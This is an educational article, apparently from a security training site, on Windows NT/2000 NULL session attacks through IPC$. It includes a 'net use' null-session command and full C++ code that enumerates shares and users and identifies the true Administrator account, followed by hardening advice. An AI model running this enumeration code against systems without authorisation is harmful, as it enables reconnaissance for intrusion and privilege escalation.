Windows NULL session access, Remote Procedure Calls and IPC$

A NULL session connection is an unauthenticated connection to an NT/W2000 machine. Gaining NULL session access to an NT\W2000 system is the number one method for hackers to enumerating information about an NT\W2000 machine. From a NULL session hackers can call APIs and use Remote Procedure calls to enumerate information. These techniques can, and will provide information on passwords, groups, services, users and even active processors. NULL session access can also even be used for escalating privileges and perform DoS attacks.

See the below table for TCP/UDP ports and their use within NT\W2000.

Keyword Decimal Description

---------------------------------------------------------------

loc-srv 135/tcp Location Service (RPC endpoint mapping)

loc-srv 135/udp Location Service (RPC endpoint mapping)

netbios-ns 137/tcp NETBIOS Name Service

netbios-ns 137/udp NETBIOS Name Service

netbios-dgm 138/tcp NETBIOS Datagram Service

netbios-dgm 138/udp NETBIOS Datagram Service

netbios-ssn 139/tcp NETBIOS Session Service

netbios-ssn 139/udp NETBIOS Session Service

For more information on port usage, see RFC1001, RFC1002

The above ports are often found open on a standard NT\W2000 installation. A null session can only be made to TCP port 139, but the above other ports are often required for code to be called effectively. Port 135 for example is used for RPC endpoint mapping.

From a hackers point of view when thinking about writing code to enumerate information and call remote procedures; Exactly what can be called is hard to know, except for the things that are already known. There is little documentation available outside of Microsoft that describes the different calls available after a null session has been established. The only thing hackers can do is try whatever they can think of and see what happens, then try to understand why it works the way it does. There could be things nobody outside Microsoft knows of yet. A lot of what is known though is wrote into tools to enumerate this information, tools such as penetration scanners, DumpACL, epdump, Getmac and even net view use these techniques. This is the only way currently coded into NT/Windows 2000 to gather such information remotely. These tools are unfortunately a doubled edged sword, a balance between usability and security. Windows 2000 uses this same method for information enumeration so the same problems/usability will persist.

What this does tell us though is that these NULL sessions, RPC etc should not be allowed on public networks or evenprivate networks on some occasions if security is of concern. This type of access requires the use of session layer protocols Server Message Block (SMB) and NetBIOS that provide a higher layer functionality to that of simply TCP/UDP/IP. The TCP/IP connection to port 139 is made, then the session layer protocols SMB and NetBIOS are used to access the NT hidden share IPC$. From the NT command line this can be performed with the following: net use \\127.0.0.1\ipc$ "" /user:"" This technique was programmatically written into an old exploit called the Redbutton attack.

From this NULL session connection all the above mentioned tools can be used and standard Microsoft APIs called. For example the WIN32 functions, LookupAccountName and LookupAccountSid, which reveal the SID or RID to account name and account name to SID or RID. Examples of these functions being called can be seen in user2sid.exe and sid2user.exe developed by Evgenii Borisovich Rudnyi.

What is shown below is a programmatic connection to an NT\W2000 machines via NULL sessions that then enumerates the true administrator account. This is achieved by using APIs to scan for the SID with the value 500, which is always the Administrator account renamed or otherwise. The following code segment was supplied by JD Glaser from NT OBJECTives, Inc which is an excellent site for NT tools which demonstrate this same level of remote access (http://www.ntobjectives.com/).

Follow the comments to see exactly where the APIs are used to enumerate the relevant information;

First - making a NULL Session connection

One way to this is by using the Net Use command with an empty password. Programmatically, it looks like this:

//This function called from dialog that fills listbox with connections

BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg)

{

//Setup for UNICODE

char* pTemp = TargetHost.GetBuffer(256);

WCHAR wszServ[256];

LPWSTR Server = NULL;

//Convert to Unicode

MultiByteToWideChar(CP_ACP, 0, pTemp,

strlen(pTemp)+1, wszServ,

sizeof(wszServ)/sizeof(wszServ[0]) );

//Create the IPC$ share connection string we need

Server = wszServ;

LPCWSTR szIpc = L"\\IPC$";

WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL

DWORD dwServNameLen;

DWORD dwRC;

//Setup Win32 structures and variables we need

NET_API_STATUS nas;

USE_INFO_2 ui2;

SHARE_INFO_1* pSHInfo1 = NULL;

DWORD dwEntriesRead;

DWORD dwTotalEntries;

//Set up handles to tree control to insert connection results

HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot;

char sharename[256];

char remark[256];

if(Server == NULL || *Server == L'\0')

{

SetLastError(ERROR_INVALID_COMPUTERNAME);

return FALSE;

}

dwServNameLen = lstrlenW( Server );

//Test for various errors in connection string and recover

if(Server[0] != L'\\' && Server[1] != L'\\')

{

// prepend slashes and NULL terminate

RemoteResource[0] = L'\\';

RemoteResource[1] = L'\\';

RemoteResource[2] = L'\0';

}

else

{

dwServNameLen -= 2; // drop slashes from count

RemoteResource[0] = L'\0';

}

if(dwServNameLen > CNLEN)

{

SetLastError(ERROR_INVALID_COMPUTERNAME);

return FALSE;

}

if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;

if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;

//Start with clean memory

ZeroMemory(&ui2, sizeof(ui2));

//Fill in the Win32 network structure we need to use connect API

ui2.ui2_local = NULL;

ui2.ui2_remote = (LPTSTR) RemoteResource;

ui2.ui2_asg_type = USE_IPC;

ui2.ui2_password = (LPTSTR) L""; //SET PASSWORD TO NULL

ui2.ui2_username = (LPTSTR) L"";

ui2.ui2_domainname = (LPTSTR) L"";

//MAKE THE NULL SESSION CALL

nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);

dwRC = GetLastError();

if( nas == NERR_Success )

{

machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0, TVI_ROOT);

}

//THIS IS WHERE NT HANDS OUT IT INFORMATION

nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1,

MAX_PREFERRED_LENGTH,

&dwEntriesRead,

&dwTotalEntries, NULL);

dwRC = GetLastError();

if( nas == NERR_Success )

{

if(dwTotalEntries > 0)

{

shareRoot = pDlg->m_Victims.InsertItem("Shares", machineRoot,TVI_LAST);

userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot,TVI_LAST);

adminRoot = pDlg->m_Victims.InsertItem("Admin", machineRoot,TVI_LAST);

}

for(int x=0; x<(int)dwTotalEntries; x++)

{

// Convert back to ANSI

WideCharToMultiByte(CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_netname, -1,

sharename, 256, NULL, NULL );

WideCharToMultiByte( CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_remark, -1,

remark, 256, NULL, NULL );

CString ShareDetails = sharename;

ShareDetails = ShareDetails + " - " + remark;

//fill the tree with connect info

attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot,TVI_LAST);

pSHInfo1++;

}

}

//My Wrapper function for listing users - see below

DoNetUserEnum(Server, pDlg, userRoot, adminRoot);

//WE ARE DONE, SO KILL THE CONNECTION

nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);

TargetHost.ReleaseBuffer();

SetLastError( nas );

return FALSE;

}

The following function is how one can programmatically determine the administrator status of an account......

bool GetAdmin(char* pServer, char* pUser, CString& Name)

{

BOOL fAdmin = FALSE;

DWORD dwDomainName,dwSize,dwAdminVal;

SID_NAME_USE use;

PSID pUserSID = NULL; // SID for user

int rc;

int iSubCount;

bool bFoundHim = 0;

dwDomainName = 256;

dwSize = 0;

dwAdminVal = 0;

iSubCount = 0;

//Call API for buffer size since we don't know size beforehand

rc = LookupAccountName(pServer,

pUser, pUserSID,

&dwSize, szDomainName,

&dwDomainName, &use );

rc = GetLastError();

//Allocate a larger buffer

if(rc == ERROR_INSUFFICIENT_BUFFER)

{

pUserSID = (PSID) malloc(dwSize);

//Repeat call now that we have the right size buffer

rc = LookupAccountName(pServer,

pUser, pUserSID,

&dwSize, szDomainName,

&dwDomainName, &use );

}

//Scan the SIDS for the golden key - ADMIN == 500

//Get a count of SID's

iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID));

//Admin SID is the last element in the count

dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1));

if(dwAdminVal==500) //TEST TO SEE IF THIS IS THE ADMIN

{

Name.Format("Admin is %s\\%s\n", szDomainName, pUser);

bFoundHim = true;

}

delete pUserSID;

return bFoundHim; //WE KNOW WHO HE IS, ADD HIM TO THE TREE

}

Wrapper for Listing the user accounts.....

void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot)

{

USER_INFO_10 *pUserbuf, *pCurUser;

DWORD dwRead, dwRemaining, dwResume, dwRC;

char userName[256];

char userServer[256];

dwResume = 0;

if(pServer[0] != L'\\' && pServer[1] != L'\\')

{

//Start sting with correct UNC slashes and NULL terminate

RemoteResource[0] = L'\\';

RemoteResource[1] = L'\\';

RemoteResource[2] = L'\0';

}

else

{

dwServNameLen -= 2; // drop slashes from count

RemoteResource[0] = L'\0';

}

if(dwServNameLen > CNLEN)

{

SetLastError(ERROR_INVALID_COMPUTERNAME);

return;

}

if(lstrcatW(RemoteResource, pServer) == NULL) return;

do

{

pUserbuf = NULL;

//THIS IS THE API THE NT USES TO HAND OUT IT's LIST

dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf, 1024,

&dwRead, &dwRemaining, &dwResume);

if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)

break;

DWORD i;

for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser)

{

// Convert back to ANSI.

WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name, -1, userName, 256, NULL, NULL );

// Convert back to ANSI.

WideCharToMultiByte( CP_ACP, 0, pServer, -1,

userServer, 256, NULL, NULL );

if(!GotAdmin)

{

//use char strings

CString Admin;

GotAdmin = GetAdmin(userServer, userName, Admin);

if(GotAdmin)

{

Admin.TrimRight();

HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST);

pDlg->m_Victims.EnsureVisible(adminChild);

}

}

CString strUserName = userName;

pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);

}

if (pUserbuf != NULL)

NetApiBufferFree(pUserbuf);

} while (dwRC == ERROR_MORE_DATA);

if (dwRC != ERROR_SUCCESS)

printf("NUE() returned %lu\n", dwRC);

}

So what can be done to stop all this?

Several things can be done but in doing them you will reduce the functionality of your NT\W2000 machine.

A balance between usability/functionality and security needs to be found.

  1. Restrict access to objects from Anonymous accounts?

Please read MSKB Q143474 to understand the effect this has.

Strangely NULL sessions can still be made, but the information that is available is restricted. For example

sid2user will still function even with RestrictAnonymous set.

See http://geek-girl.com/bugtraq/1997_2/0079.html for the original exploit.

This registry setting is automatically created within Windows 2000 but is set to (0) disabled.

  1. Removing the 'Workstation' and 'Server' service. This removes the ability of the NT\W2000 machine to respond to client or server requests.
  1. Disabling NetBIOS through the registry and or removing the 'NetBIOS Interface' service. This removes the session layer protocol NetBIOS which is required for file sharing (IPC$).

Remember you must understand the functionality that this will reduce from making any of these changes. For example the above level of change(s) may not be desirable for a workstation but would be for a web server.

Things are changing with Windows 2000, as NetBIOS is not actually required anymore in a native Windows 2000 environment. Windows 2000 also reduces the available APIs that can be called, for example the 'reg' calls are greatly reduced. So no longer can registry permissions be enumerated in Windows 2000 like they could within NT. Most of the other calls are still available in W2000 like SID information and the file ACLs all via the NULL session.

There are also other methods for preventing NULL session other than the ones described above. These are possibly the most effect on an NT\W2000 O/S level though. See https://www.stationx.net/downloads/ for more information.

On a network level the TCP/UDP ports 135-139 detailed above would be blocked using firewall(s) and or filtering router(s) from public access.

Level Up in Cyber Security: Join Our Membership Today!

vip cta image
vip cta details
  • Nathan House

    Nathan House is the founder and CEO of StationX. He has over 25 years of experience in cyber security, where he has advised some of the largest companies in the world. Nathan is the author of the popular "The Complete Cyber Security Course", which has been taken by over half a million students in 195 countries. He is the winner of the AI "Cyber Security Educator of the Year 2020" award and finalist for Influencer of the year 2022.

>

StationX Accelerator Pro

Enter your name and email below, and we’ll swiftly get you all the exciting details about our exclusive StationX Accelerator Pro Program. Stay tuned for more!

StationX Accelerator Premium

Enter your name and email below, and we’ll swiftly get you all the exciting details about our exclusive StationX Accelerator Premium Program. Stay tuned for more!

StationX Master's Program

Enter your name and email below, and we’ll swiftly get you all the exciting details about our exclusive StationX Master’s Program. Stay tuned for more!